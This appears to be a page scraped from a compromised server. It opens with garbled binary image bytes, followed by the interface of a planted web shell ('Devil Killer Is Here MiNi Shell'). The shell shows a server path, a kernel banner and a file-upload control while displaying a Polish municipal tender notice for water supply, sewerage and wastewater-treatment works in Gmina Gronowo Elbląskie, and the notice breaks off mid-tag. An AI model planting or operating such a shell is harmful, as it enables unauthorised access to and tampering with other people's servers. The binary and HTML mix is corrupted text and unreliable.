JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/0016885801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa zbiorowych systemów zaopatrzenia w wodę, systemów kanalizacji dla ścieków komunalnych oraz budowa oczyszczalni ścieków na terenie Gminy Gronowo Elbląskie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GRONOWO ELBLĄSKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170748070</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Łączności 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gronowo Elbląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-335</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gminagronowo@gminagronowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminagronowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa zbiorowych systemów zaopatrzenia w wodę, systemów kanalizacji dla ścieków komunalnych oraz budowa oczyszczalni ścieków na terenie Gminy Gronowo Elbląskie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7110838a-7447-42ea-b5a9-d09468c3ec0b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00168858</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041599/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa zbiorowych systemów zaopatrzenia w wodę, systemów kanalizacji dla ścieków na terenie Gminy Gronowo Elbląskie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie inwestycyjne dofinansowane jest ze środków Programu Rozwoju Obszarów Wiejskich na lata 2014-2020 dla zadania z zakresu „Gospodarki wodno-ściekowej” tytuł zadania: „Budowa zbiorowych systemów zaopatrzenia w wodę, systemów kanalizacji dla ścieków komunalnych oraz budowa oczyszczalni ścieków na terenie Gminy Gronowo Elbląskie”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminagronowo.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywać<br/>się będzie przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy znajdującej się pod adresem:<br/>https://gminagronowo.ezamawiajacy.pl poprzez kafelek „Wiadomość” kierujący do modułu korespondencja.<br/>2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne<br/>wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>• Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>• Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>• Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>• Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Ofertę składa się w języku polskim, w formie danych doc, docx, pdf, xis, xlsx, odt.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. (dalej RODO) informuję, iż administratorem Pani/Pana danych osobowych jest Gmina Gronowo Elbląskie z siedzibą przy ul. Łączności 3, 82-335 Gronowo Elbląskie, reprezentowana przez Wójta Gminy Gronowo Elbląskie.<br/>1) Administrator wyznaczył Inspektora Danych Osobowych kontakt: Pan Andrzej Wiśniewski, kontakt: listownie na adres: ul. Łączności 3, 82-335 Gronowo Elbląskie, e-mail: iod@gminagronowo.pl<br/>2) Dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego ZRGo.271.4.2025 „Budowa zbiorowych systemów zaopatrzenia w wodę, systemów kanalizacji dla ścieków komunalnych oraz budowa oczyszczalni ścieków na terenie Gminy Gronowo Elbląskie” w trybie podstawowym art. 275 pkt 2 ustawy Pzp,<br/>3) Pani/Pan dane osobowe będą lub mogą być przekazywane wyłącznie podmiotom uprawnionym do uzyskania danych osobowych na podstawie przepisów prawa, szczególności odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp<br/>4) Podawane dane osobowe będą przechowywane przez okres niezbędny do realizacji wskazanych w pkt 2 celów, a po tym czasie<br/>przez okres oraz w zakresie wymaganym przez przepisy prawa,<br/>5) Posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>Szczegółowe informację w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZRGo.271.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres przedmiotu zamówienia obejmuje:<br/>1) Zadanie 1: Miejscowość Gronowo Elbląskie<br/>Zadanie obejmuje między innymi:<br/>• budowę stacji zlewnej w miejscowości Gronowo Elbląskie,<br/>• wymianę pomp oraz montaż dodatkowego wyposażenia przepompowni w miejscowości Gronowo Elbląskie,<br/>• budowę studni z sitem pionowym w miejscowości Gronowo Elbląskie,<br/>• remont istniejącego budynku technicznego w miejscowości Gronowo Elbląskie,<br/>• budowę sieci kanalizacji sanitarnej tłoczonej w miejscowości Gronowo Elbląskie,<br/>• instalację kanalizacji sanitarnej, grawitacyjnej w miejscowości Gronowo Elbląskie,<br/>• budowę zbiornika na ścieki „dowożone” w miejscowości Gronowo Elbląskie,<br/>• budowę (modernizację) zbiornika przepompowni ścieków<br/>UWAGA:<br/>Szczegółowy zakres robót do wykonania został określony w:<br/>1. Projekt Techniczny – załącznik nr 1 do SWZ,<br/>2. Projekt Zagospodarowania Terenu - załącznik nr 2 do SWZ,<br/>3. Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych zwanej dalej STWiOR – załącznik nr 3 do SWZ.<br/>4. Przedmiar robot (pomocniczo) – załącznik nr 4 do SWZ<br/><br/>2) Zadanie 2: Miejscowość Nowy Dwór Elbląski<br/>Zadanie obejmuje między innymi:<br/>• budowę oczyszczalni ścieków w technologii obrotowych złóż biologicznych (GRP) – 100 RLM, wraz z budową niezbędnych<br/>elementów technologicznych i wyposażenia do obsługi oczyszczalni ścieków.<br/>UWAGA:<br/>Szczegółowy zakres robót do wykonania został określony w:<br/>1. Projekt Techniczny – załącznik nr 5 do SWZ,<br/>2. Projekt Zagospodarowania Terenu - załącznik nr 6 do SWZ,<br/>3. Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych zwanej dalej STWiOR – załącznik nr 7 do SWZ.<br/>4. Przedmiar robot (pomocniczo) – załącznik nr 8 do SWZ<br/>Wykonawca zobowiązany jest do zrealizowania pełnego zakresu rzeczowego zamówienia z należyta starannością,<br/>zgodnie z warunkami przedmiotowego postępowania opisanymi w SWZ (z załącznikami), obowiązującymi przepisami<br/>prawa, w tym określonymi w ustawie z dnia 07 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2024 r. poz.725 ze zm.), zgodnie<br/>z zasadami sztuki budowlanej, ogólnie przyjętą wiedzą w tym zakresie, ofertą Wykonawcy oraz ustaleniami z<br/>Zamawiającym.<br/>5. Wymagania Zamawiającego w zakresie wykonania przedmiotu umowy:<br/>Wymagania w zakresie robót budowlanych:<br/>1) Wykonawca obowiązany jest sporządzić harmonogram rzeczowo-finansowy robót i przedłożyć Zamawiającemu w ciągu 7<br/>dni od dnia podpisania umowy,<br/>2) Wykonawca zapewni we własnym zakresie wszelkie materiały i urządzenia niezbędne z wykonywaniem przedmiotu<br/>zamówienia, a roboty budowlane wykona z należytą starannością, zgodnie z obowiązującymi przepisami,<br/>3) Wykorzystywane materiału i urządzenia muszą posiadać wszelki atesty i certyfikaty wymagane zgodnie z obowiązującymi<br/>w tym zakresie przepisami.<br/>6. Wymagania Zamawiającego w zakresie urządzenia, utrzymania zaplecza budowy.<br/>1) Wykonawca wykonana i utrzyma na swój koszt zaplecze budowy wraz z ewentualnym zasilaniem w energię elektryczną i<br/>wodę oraz zlikwidowania go po zakończeniu robót budowlano-montażowych,<br/>2) Wykonawca poniesie koszty wszystkich mediów niezbędnych dla zabezpieczenia potrzeb budowy i na cele socjalne np.:<br/>wody, ciepła, energii elektrycznej.<br/>7. Wymagania Zamawiającego dotyczące osób funkcyjnych:<br/>1) Wykonawca zobowiązany jest do zapewnienia wykonania i kierowania robotami objętymi niniejszym zamówieniem przez<br/>osoby posiadające stosowne kwalifikacje zawodowe i uprawnienia budowlane,<br/>2) Wykonawca zobowiązany jest wyznaczyć przedstawiciela Wykonawcy na cały okres realizacji umowy i udzielić mu<br/>odpowiednie pełnomocnictwo do reprezentowania Wykonawcy,<br/>3) Kierownika budowy i kierowników robót branżowych będą pełniły osoby wskazane<br/>w ofercie Wykonawcy,<br/>4) Kierownik budowy oraz odpowiednio kierownicy robót są zobowiązani uczestniczyć<br/>w naradach koordynacyjnych.<br/>8. Wymagania Zamawiającego dotyczące zawiadamiania o szczególnych zdarzeniach:<br/>1) Jeżeli w trakcie wykonywania robót Wykonawca natrafi na przeszkody fizyczne, nie przewidziane dokumentacją<br/>projektową, jest on zobowiązany do niezwłocznego powiadomienia o tym fakcie Inspektora nadzoru,<br/>2) Wykonawca ma obowiązek na bieżąco informowania Inspektora nadzoru<br/>o dostrzeganych lub przewidywanych problemach związanych z realizacją Umowy, które mogą mieć wpływ w szczególności<br/>na wysokość wynagrodzenia Wykonawcy lub na termin zakończenia robót.<br/>9. Wymagania Zamawiającego dotyczące ochrony środowiska:<br/>1) Wykonawca w czasie wykonywania robót budowlanych oraz usuwania ewentualnych wad jest zobowiązany podjąć<br/>niezbędne działania w celu ochrony środowiska i przyrody na terenie budowy i wokół terenu budowy,<br/>2) Wykonawca jest zobowiązany uzyskać niezbędne uzgodnienia i pozwolenia na wywóz nieczystości stałych i płynnych<br/>oraz bezpieczne i prawidłowe odprowadzenie ścieków, substancji ropopochodnych oraz wód gruntowych i opadowych z<br/>terenu budowy oraz miejsc związanych z wykonywaniem robót budowlanych, w sposób zapewniający ochronę robót przed<br/>uszkodzeniem oraz terenów i miejsc przed zanieczyszczeniem,<br/>3) Wykonawca jest zobowiązany usuwać odpady z terenu budowy z zachowaniem przepisów ustawy z dnia 14 grudnia<br/>2012r. o odpadach,<br/>4) Wykonawca ponosi odpowiedzialność z tytułu konieczności uiszczenia opłat, kar lub grzywien przewidzianych w<br/>przepisach dotyczących ochrony środowiska lub przyrody<br/>i przepisach regulujących gospodarkę odpadami,<br/>5) Wykonawca zobowiązuje się do podjęcia czynności prawnych zmierzających do przejęcia odpowiedzialności z tytułu<br/>zobowiązań prywatnoprawnych lub publicznoprawnych, które mogą być dochodzone od Zamawiającego z powodu<br/>naruszenia przez Wykonawcę przepisów w zakresie ochrony środowiska lub przyrody,<br/>6) Gruz budowlany uzyskany w tracie prowadzonych robót rozbiórkowych należy odwieźć w miejsce wskazane przez<br/>Zamawiającego.<br/>10. Wymagania Zamawiającego dotyczące naprawy uszkodzeń:<br/>1) Wykonawca jest zobowiązany chronić przed uszkodzeniem lub kradzieżą wykonane przez siebie roboty i materiały<br/>przeznaczone do wykonania robót, do dnia odbioru końcowego robót,<br/>2) Uszkodzenia w robotach lub materiałach powstałe w okresie, o którym mowa powyżej Wykonawca jest zobowiązany<br/>naprawić na własny koszt w sposób zapewniający zgodność robót i materiałów z wymaganiami Specyfikacji Technicznej<br/>Wykonania<br/>i Odbioru Robót odpowiednimi normami, aprobatami i obowiązującymi przepisami prawa,<br/>3) Wykonawca jest odpowiedzialny za uszkodzenia w robotach lub materiałach przeznaczonych do wbudowania w obiekt,<br/>którego dotyczą roboty budowlane będące przedmiotem Umowy; za uszkodzenia powstałe w okresie wykonywania robót<br/>lub<br/>w okresie odpowiedzialności Wykonawcy za wady, wskutek okoliczności, za które odpowiada Wykonawca, Podwykonawca<br/>lub dalszy Podwykonawca.<br/>11. Wymagania dotyczące dokumentacji powykonawczej do odbioru końcowego:<br/>1) Wykonawca opracuje w 3 egz. w wersji papierowej i w 2 egz. w wersji elektronicznej dokumentację powykonawczą<br/>opracowaną zgodnie z przepisami Prawa budowlanego<br/>i zapisami Umowy oraz zgodnie z decyzjami administracyjnymi,<br/>2) Dokumentacja Powykonawcza winna zawierać w szczególności:<br/>a) dokumentację projektową powykonawczą,<br/>b) inwentaryzację powykonawczą wszystkich obiektów i przyłączy,<br/>c) zestawienie wykorzystanych materiałów,<br/>d) uwagi i zalecenia Inspektora nadzoru, zwłaszcza przy odbiorze robót zanikających i ulegających zakryciu i<br/>udokumentowanie wykonania jego zaleceń,<br/>e) Dziennik budowy,<br/>f) protokoły odbioru robót zanikających, częściowych i odbiór końcowy oraz odbioru instalacji,<br/>g) wyniki pomiarów kontrolnych oraz badań i oznaczeń laboratoryjnych,<br/>h) atesty jakościowe wbudowanych materiałów,<br/>i) dokumentację techniczno- rozruchową zainstalowanych maszyn i urządzeń,<br/>j) inne dokumenty zgodnie z dokumentacją.<br/>Minimalny wymagany okres gwarancji dla przedmiotu zamówienia wynosi 36 miesięcy od dnia podpisania (bez uwag)<br/>protokołu końcowego robót stwierdzającego wykonanie całego przedmiotu Umowy, maksymalny okres wynosi 60 miesięcy.<br/>Zamawiający wymaga, aby okres rękojmi na przedmiot umowy był równy okresowi udzielonej gwarancji.<br/>13. Zgodnie z art. 95 ustawy Pzp Zamawiający wymaga zatrudnienia na podstawie umowy<br/>o pracę przez Wykonawcę lub Podwykonawcę pracowników fizycznych bezpośrednio wykonujących roboty budowlane oraz<br/>inne czynności niezbędne do wykonania zamówienia (prace ogólnobudowlane, rozbiórkowe, ziemne, roboty budowlane<br/>porządkowe).<br/>14. Przeprowadzenie pełnego instruktarzu i obsługi zamontowanych urządzeń przed odbiorem robót.<br/>Szczegółowy opis przedmiotu zamówienia w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232421-9 - Roboty w zakresie oczyszczania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>a) cena (brutto) - 60 % (max 60 pkt),<br/>b) okres gwarancji jakości - 20 % (max. 20 pkt)<br/>c) zapewnienie osoby pełniącej funkcję technologa/serwisanta w okresie gwarancji – 20% (max 20 pkt.)<br/>Łącznie, oferta może uzyskać maksymalnie 100 pkt.<br/>Sposób oceny ofert:<br/>a) w kryterium cena (brutto):<br/>Oferta z najniższą ceną otrzyma 60 pkt, natomiast pozostałe oferty będą obliczone wg następującego wzoru:<br/>najniższa cena brutto spośród złożonych ważnych ofert<br/>liczba punktów w kryterium cena = -------------------------------------------- x 60<br/>cena brutto oferty badanej<br/>b) w kryterium okres gwarancji:<br/>Podczas oceny ofert Zamawiający w celu przyznania punktów rozpatrywać będzie okres gwarancji jakości zaoferowany przez<br/>Wykonawcę w Formularzu oferty.<br/>Okres gwarancji udzielonej przez Wykonawcę musi zostać podany w pełnych miesiącach. Okres gwarancji udzielonej przez<br/>Wykonawcę nie może być krótszy niż 36 miesięcy i nie może przekroczyć 60 miesięcy, dla ofert z dłuższym okresem gwarancji niż<br/>60 miesięcy przyjmowany będzie dla oceny ofert okres gwarancji równy 60 miesięcy. W przypadku wyznaczenia przez Wykonawcę<br/>terminu gwarancji krótszego niż 36 miesięcy Zamawiający odrzuci ofertę.<br/>Oferta z najdłuższym okresem gwarancji otrzyma 20 pkt., natomiast pozostałe oferty będą obliczone wg następującego wzoru:<br/>okres gwarancji oferty badanej<br/>liczba punktów w kryterium gwarancja jakości = --------------------------------------- x 20<br/>60 miesięcy (najdłuższy okres gwarancji)<br/>c) zapewnienie osoby pełniącej funkcję technologa/serwisanta w okresie gwarancji:<br/>W kryterium oceniane będzie zadeklarowane w Formularzu oferty, stanowiący załącznik nr 13 do SWZ, zapewnienie osoby pełniącej<br/>funkcję technologa/serwisanta w okresie gwarancji, Wykonawca otrzyma punkty:<br/>-zadeklarowanie osoby bezpośredniego kontaktu pełniącego funkcję technologa/serwisanta w okresie gwarancji – 20 pkt,<br/>-niezadeklarowanie osoby bezpośredniego kontaktu pełniącego funkcję technologa/serwisanta w okresie gwarancji – 0 pkt,<br/>d) obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, przy zastosowaniu matematycznych reguł<br/>zaokrąglania liczb.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 